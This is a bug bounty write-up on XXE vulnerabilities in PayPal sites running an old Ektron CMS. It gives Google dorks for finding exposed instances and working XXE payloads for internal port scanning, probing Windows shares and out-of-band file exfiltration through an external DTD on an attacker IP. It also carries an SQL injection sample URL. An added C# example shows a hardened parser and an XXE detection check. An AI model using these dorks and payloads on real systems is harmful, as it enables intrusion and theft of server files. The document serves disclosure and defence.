XXE
Sean Melia @seanmeals
https://www.linkedin.com/in/meliasean
https://www.hackerone.com/meals
Introduction
I was able to find three XML External Entity (XXE) attacks on PayPal's externally
facing sites. The vulnerabilities are related to Ektron CMS, which has been notorious
for vulnerabilities. PayPal was running an older version of Ektron which left the web
services exposed.
Here's the write up!
Exploit
Google Dork to find some PayPal services running Ektron:
inurl:robots.txt intext:Disallow: /workarea/ site:*.paypal.*
https://www.paypal.fr/WorkArea/webservices/SearchService.asmx?op=ExecuteSearch
Many of the web services require authentication, but the search functions do
not! Surprisingly, these are the functions that are using a vulnerable XML parser!
By submitting the query parameter with a blank value I was presented with an error
referencing LoadXml, which in the past has been vulnerable to XXE.
I then submitted some XML to test if I could scan ports on their internal
servers/networks. I was able to!
Payload:
query=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:80">]><foo>&xxe;</foo>
Port 80 response shows there is a service listening:
Port 22 response shows there is no service listening:
Change the port number to whatever port you would like to scan, or run it through
Intruder and do an automated port scan. Compare the response sizes and content to
determine which ports have a service listening on them. Anything with a response
size different from 2453 shows that there is a service listening.
This can be used to enumerate services listening internally that may be vulnerable
to SQL injection or command execution via GET parameters in the URL. E.g.
http://10.10.10.67:9999/?id= waitfor delay00:00:10-- -
This attack can also connect to Windows Shares. An attacker can scan the internal
network and look for open shares containing sensitive documents.
Payload:
query=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE roottag [<!ENTITY % file SYSTEM "\\localhost\Admin$"><!ENTITY % dtd SYSTEM "http://104.236.212.244/evil1.dtd">%dtd;]><roottag>&send;</roottag>
I can also read local files off of the webserver using an out-of-band method by
hosting an external DTD.
External .dtd file that I am referencing from my server:
The win.ini file outputted to my server logs:
URL Decoded output:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Some other log files found on Windows systems that I was also able to pull:
C:\windows\security\logs\scecomp.old
C:\windows\security\logs\scesrv.log
Conclusion
The impact of this XXE is that a persistent attacker can find the location of sensitive
files such as web.config and steal private information from PayPal. They can then
use that information, together with data retrieved from other configuration files,
to pivot to other services that PayPal uses to hold internal and customer data.
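The following is an added example, not code from Ektron, PayPal or this write-up. It shows the .NET XmlDocument.LoadXml pattern that the error message above points at, as it is exploitable on .NET Framework builds where XmlDocument resolves external entities by default, beside a hardened replacement, plus a request-side check for the DOCTYPE and SYSTEM/parameter-entity constructs that the port-scan, UNC-share and external-DTD payloads above all rely on. The class and method names are assumptions.

```csharp
using System;
using System.IO;
using System.Xml;

// Added example (hypothetical names); demonstrates the mechanism, not any real deployment.
public static class XxeDemo
{
    // Vulnerable: an XmlDocument with a live resolver fetches every SYSTEM entity it
    // meets, so a query such as <!ENTITY xxe SYSTEM "http://127.0.0.1:80"> makes the
    // server issue the request (port probe, UNC path, or external DTD) during LoadXml.
    // Older .NET Framework releases set this resolver by default; it is explicit here.
    public static XmlDocument LoadUnsafe(string query)
    {
        var doc = new XmlDocument();
        doc.XmlResolver = new XmlUrlResolver();
        doc.LoadXml(query);
        return doc;
    }

    // Hardened: a search query never needs a DTD, so reject DOCTYPE outright and give
    // both reader and document no resolver. Any <!DOCTYPE ...> now throws XmlException
    // before a single entity can be resolved.
    public static XmlDocument LoadSafe(string query)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null,
        };
        var doc = new XmlDocument { XmlResolver = null };
        using (var reader = XmlReader.Create(new StringReader(query), settings))
        {
            doc.Load(reader);
        }
        return doc;
    }

    // Cheap pre-parse check for logging or alerting on the request path: a DOCTYPE
    // plus an external (SYSTEM/PUBLIC) entity, or a parameter entity (%name;) which
    // is the out-of-band DTD case. Case-insensitive because the keywords are.
    public static bool LooksLikeXxe(string query)
    {
        if (string.IsNullOrEmpty(query)) return false;
        string q = query.ToUpperInvariant();
        bool hasDoctype = q.Contains("<!DOCTYPE");
        bool hasExternal = q.Contains("<!ENTITY") && (q.Contains(" SYSTEM") || q.Contains(" PUBLIC"));
        bool hasParamEntity = q.Contains("<!ENTITY %");
        return hasDoctype && (hasExternal || hasParamEntity);
    }
}
```

LooksLikeXxe returns true for both payloads shown above and false for a plain <foo>bar</foo> query; it is a logging aid, not a substitute for LoadSafe, which is what actually closes the hole.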
Additional Info
Google Dorks to find other Ektron instances
1. inurl:/WorkArea/webservices/
2. inurl:robots.txt intext:Disallow: /workarea/
Resources
http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing